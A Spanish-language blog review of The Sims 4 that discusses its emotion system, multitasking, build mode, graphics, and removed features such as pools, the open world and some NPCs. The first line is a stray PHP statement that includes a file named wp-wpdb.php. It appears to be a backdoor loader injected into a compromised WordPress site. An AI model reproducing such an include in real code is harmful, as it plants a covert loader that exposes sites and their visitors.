if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Los Sims 4 – La Fortaleza de LeChuck

Análisis Los Sims 4

¿Quién no ha jugado a Los Sims? incluso tú, que quizás lo odias, y te burlas de la gente que juega, seguro que no te has podido resistir a probarlo. O juegas en secreto para mantener tu reputación de jugador hardcore. Ya han pasado 14 años desde la primera entrega de Los Sims, la cual supuso una revolución en la forma de jugar, creando un simulador de vida. Los Sims 4 ha llegado con muchas mejoras, nuevas características y también con fuertes críticas por parte de la comunidad. Veamos porqué.

losims4

Las novedades de los Sims 4 las notamos desde que se inicia el juego, donde nos topamos con varios sims realizando actividades diversas, a partir de aquí podremos trasladar a una unidad doméstica por defecto a un solar, o hacer lo que es realmente divertido, dedicar unos minutos a trastear con el creador de sims. Realmente el proceso de creación de sims en Los Sims 4 es muy intuitivo y sencillo, y en un periquete tendremos un personaje a nuestra justa medida entre las miles de opciones de personalización, las cuales incluyen físico, personalidad y aspiraciones. En Los Sims 3, tu sim tenía un flujo constante de metas a alcanzar a corto plazo, cada una por valor de puntos de aspiración. Un sistema similar encontramos aquí, a excepción de algunos de sus objetivos dependen del nuevo sistema de emociones.

los-sims-4_2
Tranquilos, le cambié los zapatos

Las emociones impulsan a tus sims más que nunca en Los Sims 4, con una serie de acciones que varían según el humor de tu sim. Según cómo interactue con objetos y vecinos, sus emociones serán las siguientes: normal, contento, vigorizado, inspirado, vacilón, coqueto, avergonzado, incómodo, y un largo etcétera. ¿Y en qué influye esto? Pues por ejemplo, si nuestro sim está en modo vacilón, podrá contar nuevos chistes, o si está en estado coqueto, podrá realizar acciones como «besar las manos». Todas éstas están resaltadas con el color del estado de ánimo. Cuando su sim empieza a sentir una emoción fuerte, una pequeña burbuja aparecerá encima de su perfil con un objetivo a cumplir a corto plazo. Si tu sim está avergonzado, aparecerá una burbuja en la que deseará desahogarse con alguien y estará disponible la respectiva acción. Si en cambio tu sim se siente coqueta, la burbuja puede indicar que quiere ñiqui ñiqui con alguien. Cada vez que completes una de estas mini metas, se obtendrán puntos de aspiración que se pueden gastar en una serie de objetos para hacer la experiencia más cómoda: frascos eliminadores de cansancio, del hambre, etc. Las emociones son una gran idea y dan personalidad a los sims. Es así como el juego se siente más simulador de vida, y por lo tanto, más realista y natural.

los-sims-4_4
En cada cita hay unos objetivos generales a cumplir para que sea un éxito, más los del sim. La mía pedía guerra.

En cuanto a las aspiraciones de tus sims o deseo de toda la vida en Los Sims 3 son más difíciles de alcanzar. En lugar de tener una meta grande —como llegar al nivel 10 de la carrera de política existen un montón de pequeños objetivos. Esto está destinado a difundir la sensación de esfuerzo a largo plazo y abrir nuevas vías de desarrollo de cada sim.

Otra nueva característica es la capacidad de multitarea. En juegos anteriores, tu sim podía sentarse, ver la televisión y también hablar con alguien que estaba sentado cerca. Ahora se pueden realizar muchas más cosas a la vez. Por ejemplo, nuestro sim puede tener un plato de comida en la mano, ir a abrir la puerta con él y charlar con el vecino mientras come, sin tener que cancelar acciones. Otro ejemplo: tu sim puede sentarse en un bar, ver la televisión, beber y hablar con diferentes miembros del grupo a la vez. Todas estas acciones nos harán ahorrar tiempo y eso lo notaremos en nuestras barras de estado y en relaciones sociales.

los-sims-4_3
En los bares se pueden robar copas sin que te abofeteen, por si vais cortos de pasta.

Los Sims 4 ha mejorado en aspecto y estilo. Los gráficos son más limpios y pulidos respecto a Los Sims 3 y las animaciones son más suaves y reales. Sin embargo, conserva la estética de personajes cómicos pero con un cierto grado más realista. La interfaz de usuario es minimalista y favorece a dejar la pantalla limpia, aunque cuesta un poco de tiempo acostumbrarse.

La música es animada y divertida. Contiene todo lo que hemos conocido de la franquicia en los últimos años. Desde la música, a los efectos de sonido, Maxis ha apostado por llevarlo a un nivel superior. Las voces y las palabras balbuceantes de los Sim son más claras que nunca. Aprenderéis el lenguaje sim sin daros cuenta.

los-sims-4_5
La mejora gráfica se nota, véase aquí como invito a vecinas a galletas carbonizadas

El modo de construir tiene herramientas increíbles para crear la casa de tus sueños. Suelos, paredes, pintura, vallas, puertas, etc. a tu justa medida, todos los elementos son más accesibles y rápidos de utilizar. Podrás sacar tu arte como decorador y diseñador en Los Sims 4, ya que seguro que hay mucha más gente que como yo lo que mas disfruta en Los Sims 4 es diseñando espacios. Además, la opción buscar nos ahorra tiempo para dar con aquellos pequeños objetos escondidos. Y hablando de tiempo, otra mejora a destacar es que cuando tu sim duerme, o está en el trabajo, el tiempo se acelera y va mucho más rápido que en los juegos anteriores.

los-sims-4_7
Esta es la super choza que diseñé

La conectividad es una parte importante de Los Sims 4 y hay un portal online donde se pueden subir fotos y descargar elementos fácilmente para tu partida. Maxis están constantemente revisando las creaciones de los usuarios por lo que recibiremos durante nuestro juego notificaciones de sus recomendaciones.

Vayamos ahora a lo que trae de cabeza a toda la comunidad. Para empezar, los Sims 4 no incluye piscinas, un elemento que no ha faltado en toda la saga, y los medios nos informaron de esta desafortunada noticia antes del lanzamiento. Más tarde, se unió la eliminación de la etapa de infancia de los niños. Además, los fans del mobiliario también han echado en falta el lavavajillas. Sin embargo, esto no tiene importancia, lo que realmente preocupa a la comunidad es un conjunto de pequeñas eliminaciones: el mundo abierto, sótanos, la capacidad de ir a lugar de trabajo de nuestro sim y los npc ausentes del juego: No hay bomberos, niñeras, policías ni ladrones. Además, una serie de bugs entorpecieron la experiencia los primeros días de juego.

Lo que más pesa en los Sims 4 es la falta de mundo abierto. En Los Sims 3 habían restaurantes, piscinas públicas, estaciones y ayuntamientos. También estadios y hospitales, y se podía ver su lugar de trabajo del sim en el mapa. Ahora, tenemos dos mundos, que son como dos pequeños barrios, y casi no hay lugares a donde ir, tan solo parques, gimnasios, la biblioteca, el museo, y diversos tipos de locales para tomar algo. Sentí que siempre repetía lo mismo, además, mi sim no podía ir por su propio pie a dichos lugares, tenía que indicar dónde quería ir y aguantar una interminable pantalla de carga hasta llegar. Para salir, había que dar sobre la opción volver a casa para pasar por el proceso inverso. Para acceder a las casas de los vecinos también hay que sufrir el mismo tiempo de carga.

los-sims-4_6
Dos mundos, poco espacio

The Sims 4 se siente a nivel técnico superior pero a la misma vez simplificado, y todo indica que será completado a base de contenido adicional, es decir, DLC’s. También se nota pocos objetos, a pesar de que estamos ante el juego básico. Los juegos de Los Sims siempre han sido deliberadamente incompletos, pero esta vez se nota bastante más la carencia, aunque supongo que Maxis quería asegurarse la compra de paquetes de expansión.

Los Sims 4 tiene muchas carencias como también nuevas características de diseño y emociones para sentir a nuestro sin más vivo que nunca. En líneas generales podríamos pensar que Los Sims 4 no es la secuela de Los Sims 3, sino de Los Sims 2. Quiero creer que Maxis escuchará a la comunidad y dispondrá alguno de esos contenidos adicionales que tiene en el horno de forma gratuita, porque realmente cuando llevas varias horas echadas puedes sentirte que has llegado al final y el juego no tiene nada nuevo que ofrecerte. Los Sims 4 podría haber sido un gran juego sin el tijeretazo que ha recibido, pero si eres un fan de la saga y no te importa pagar por el contenido adicional, no te costará disfrutarlo.

Si quieres comprar Los Sims 4 al mejor precio hazlo aquí gracias a OfertasJuegos.com